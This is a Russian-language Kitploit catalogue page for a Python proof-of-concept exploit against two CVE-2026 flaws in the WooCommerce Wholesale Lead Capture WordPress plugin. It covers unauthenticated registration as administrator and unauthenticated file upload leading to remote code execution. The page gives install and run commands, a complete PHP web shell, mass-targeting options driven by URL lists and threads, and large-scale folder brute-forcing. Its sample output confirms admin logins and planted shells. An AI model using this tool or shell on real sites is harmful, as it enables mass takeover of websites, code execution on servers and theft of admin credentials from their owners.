Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-27542-CVE-2026-27540- — Неаутентифицированное повышение привилегий | Неаутентифицированная произвольная загрузка файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2026-27542-cve-2026-27540-
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubnxploited/cve-2026-27542-cve-2026-27540-

CVE-2026-27542-CVE-2026-27540-

Неаутентифицированное повышение привилегий | Неаутентифицированная произвольная загрузка файлов

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
24 месяцев назадЕщё не проверено

Печатающий SVG


🔴 Обзор уязвимостей

CVE-2026-27542 — Неаутентифицированное повышение привилегий

Описание:
Плагин WooCommerce Wholesale Lead Capture для WordPress уязвим к неаутентифицированному повышению привилегий во всех известных затронутых версиях. Уязвимость находится в обработчике AJAX-действия wwlc_create_user, который обрабатывает запросы на регистрацию пользователей без надлежащей санитизации или проверки полей ролей, предоставленных пользователем. Удалённый неаутентифицированный злоумышленник может сформировать специально созданный POST-запрос, который внедряет произвольные поля возможностей WordPress — включая wp_capabilities[administrator] — непосредственно в метаданные пользователя в момент создания учётной записи. Это позволяет злоумышленнику самостоятельно зарегистрироваться в качестве администратора WordPress без какой-либо предварительной аутентификации или взаимодействия с легитимным пользователем, что приводит к полной компрометации затронутой установки WordPress.


CVE-2026-27540 — Неаутентифицированная произвольная загрузка файлов

Описание:
Плагин WooCommerce Wholesale Lead Capture для WordPress уязвим к неаутентифицированной произвольной загрузке файлов во всех известных затронутых версиях. Уязвимость находится в AJAX-действии wwlc_file_upload_handler, которое зарегистрировано без каких-либо требований аутентификации или проверки nonce. Отправляя специально сформированный multipart POST-запрос на /wp-admin/admin-ajax.php, удалённый неаутентифицированный злоумышленник может загружать файлы произвольного типа — включая PHP-веб-шеллы — в каталог сервера wp-content/uploads/ в динамически создаваемый подкаталог wwlc-temp-*. Успешная эксплуатация приводит к удалённому выполнению кода (RCE) на веб-сервере от имени учётной записи пользователя веб-процесса.


🛠️ Описание инструмента

Это эксплойт Proof-of-Concept (PoC) для двух описанных выше критических уязвимостей, нацеленный на установки WordPress, на которых работает плагин WooCommerce Wholesale Lead Capture. Инструмент поддерживает два независимых режима атаки:

РежимТип атакиЦель
Режим 1Неаутентифицированная произвольная загрузка файлов + подбор каталога переборомЗагрузить PHP-веб-шелл и найти его с помощью многоуровневого подбора каталога
Режим 2Неаутентифицированное повышение привилегий через регистрациюСамостоятельно зарегистрироваться как администратор WordPress и подтвердить доступ администратора

📋 Требования

Системные требования

  • Python 3.8 или выше
  • Доступ в интернет к целевым системам
  • Linux / Windows / macOS

Зависимости Python

root@kitploit:~
pip install requests urllib3 colorama

Или установка через файл requirements:

root@kitploit:~
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

🚀 Установка

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-27542-CVE-2026-27540.git
cd CVE-2026-27542-CVE-2026-27540

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-27542_CVE-2026-27540.py

⚙️ Использование

Базовый запуск

root@kitploit:~
python3 CVE-2026-27542_CVE-2026-27540.py

Инструмент предоставляет интерактивный терминальный интерфейс. У вас будут запрошены все необходимые параметры.


🗂️ Формат списка целей

Создайте обычный текстовый файл (например, list.txt) с одним целевым URL в каждой строке:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

🔴 Режим 1 — Загрузка файлов + подбор каталога перебором

root@kitploit:~
Select mode [1=Upload+Folder, 2=Registration+Admin]: 1
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Shell file path [shell.php]: shell.php
Shell signature (marker inside shell) [Nx_SHELL_SIGNATURE]: Nx_SHELL_SIGNATURE
Max pattern-based folder guesses per site [50000]: 50000
Max time-based folder guesses per site [50000]: 50000
Max random-hex folder guesses per site [100000]: 100000
Upload results file [scan_results/wwlc_uploads.txt]: scan_results/wwlc_uploads.txt
Found shells file [scan_results/wwlc_shells_found.txt]: scan_results/wwlc_shells_found.txt

Пример файла шелла (shell.php):

root@kitploit:~
<?php
// Nx_SHELL_SIGNATURE
if(isset($_GET['cmd'])){ system($_GET['cmd']); }
?>

Примечание: Каталог wwlc-temp-* динамически генерируется плагином с помощью PHP-функции uniqid('wwlc-temp-'). Инструмент использует многоуровневую стратегию перебора для его обнаружения:


🟠 Режим 2 — Регистрация + внедрение роли + проверка прав администратора

root@kitploit:~
Select mode [1=Upload+Folder, 2=Registration+Admin]: 2
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Base registration username (prefix) [Nx_admin]: Nx_admin
Base registration email [[email protected]]: [email protected]
Registration results file [scan_results/wwlc_register_results.txt]:
Admin hits file [scan_results/Admin_login.txt]:

Инструмент:

  1. Обнаруживает форму регистрации WWLC и извлекает действительный nonce
  2. Отправляет специально сформированный payload регистрации, внедряющий роль administrator
  3. Пытается выполнить вход с созданными учётными данными
  4. Проверяет доступ к панели администратора через несколько admin-эндпоинтов WP
  5. Сохраняет подтверждённые успешные входы администратора в выходной файл

📁 Выходные файлы

ФайлОписание
scan_results/wwlc_uploads.txt

Пример вывода (Режим 2 — успешный вход администратора)

root@kitploit:~
[INFO]    Mode2 | Target: https://target.com
[SUCCESS] https://target.com | nonce found on /wholesale-register/: a1b2c3d4e5
[INFO]    https://target.com | using discovered nonce
[SUCCESS] https://target.com | registration success for user=Nx_admin_x7k2
[SUCCESS] https://target.com | ADMIN login confirmed as Nx_admin_x7k2

Пример вывода (Режим 1 — шелл найден)

root@kitploit:~
[INFO]    Mode1 | Target: https://target.com
[INFO]    https://target.com | upload HTTP time: 0.847s
[SUCCESS] https://target.com | upload success file_name=shell_abc123.php
[INFO]    https://target.com | pattern brute-force (50003 guesses)
[SUCCESS] https://target.com | shell FOUND via pattern: https://target.com/wp-content/uploads/wwlc-temp-00000123/shell_abc123.php
[INFO]    https://target.com | folder scan stats: attempts=123, time=4.213s, rate=29.2 req/s

📡 Контакты и автор

Автор: Nxploited (Khaled Alenazi)

 


⚠️ Отказ от ответственности

ЭТОТ ИНСТРУМЕНТ ПРЕДОСТАВЛЕН ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ И АВТОРИЗОВАННЫХ ИССЛЕДОВАНИЙ БЕЗОПАСНОСТИ.

Автор, Nxploited (Khaled Alenazi), и все участники этого проекта не одобряют, не поддерживают и не несут никакой ответственности за неправомерное использование этого инструмента или любой ущерб, причинённый использованием данного программного обеспечения против систем, на тестирование которых у вас нет явного письменного разрешения.

  • ✅ Разрешено: Использование на системах, которыми вы владеете или на тестирование которых получили явное письменное разрешение.
  • ❌ Запрещено: Использование против любых систем без предварительного явного письменного разрешения владельца системы.

Несанкционированный доступ к компьютерным системам незаконен и наказывается в соответствии с применимым законодательством, включая, помимо прочего, Закон о компьютерном мошенничестве и злоупотреблениях (CFAA), Закон о неправомерном использовании компьютеров (CMA) и аналогичные законы по всему миру.

Используя этот инструмент, вы принимаете на себя полную ответственность за свои действия и подтверждаете, что имеете законное право на тестирование целевых систем.

Автор не несёт никакой ответственности за любые прямые, косвенные, случайные или иные убытки, возникшие в результате использования или неправомерного использования данного программного обеспечения.


© 2026 Nxploited (Khaled Alenazi) — Только для авторизованных исследований безопасности.

Скачать инструмент
ПолеДетали
CVE IDCVE-2026-27542
СерьёзностьCRITICAL — оценка CVSS v3.1: 9.8
ВекторCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Затронутый компонентПлагин WooCommerce Wholesale Lead Capture (WWLC) для WordPress
Тип уязвимостиНеаутентифицированное повышение привилегий
Требуется аутентификацияНет
CWECWE-269: Некорректное управление привилегиями
ПолеДетали
CVE IDCVE-2026-27540
СерьёзностьCRITICAL — оценка CVSS v3.1: 9.8
ВекторCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Затронутый компонентПлагин WooCommerce Wholesale Lead Capture (WWLC) для WordPress
Тип уязвимостиНеаутентифицированная произвольная загрузка файлов (приводящая к удалённому выполнению кода)
Требуется аутентификацияНет
CWECWE-434: Неограниченная загрузка файла опасного типа
УровеньСтратегияОписание
0Листинг каталогаПытается получить список каталога загрузок, если он открыт
1На основе шаблоновПодбор на основе времени и последовательных числовых значений
2Hex на основе времениОснован на наблюдаемых временных метках HTTP-запросов
3Случайный HexПодбор чисто случайных hex-строк
Все сайты, на которых загрузка файлов прошла успешно (Режим 1)
scan_results/wwlc_shells_found.txtПолные URL шеллов, доступность которых подтверждена (Режим 1)
scan_results/wwlc_register_results.txtРезультаты всех попыток регистрации с учётными данными (Режим 2)
scan_results/Admin_login.txtПодтверждённые успешные входы администратора с учётными данными (Режим 2)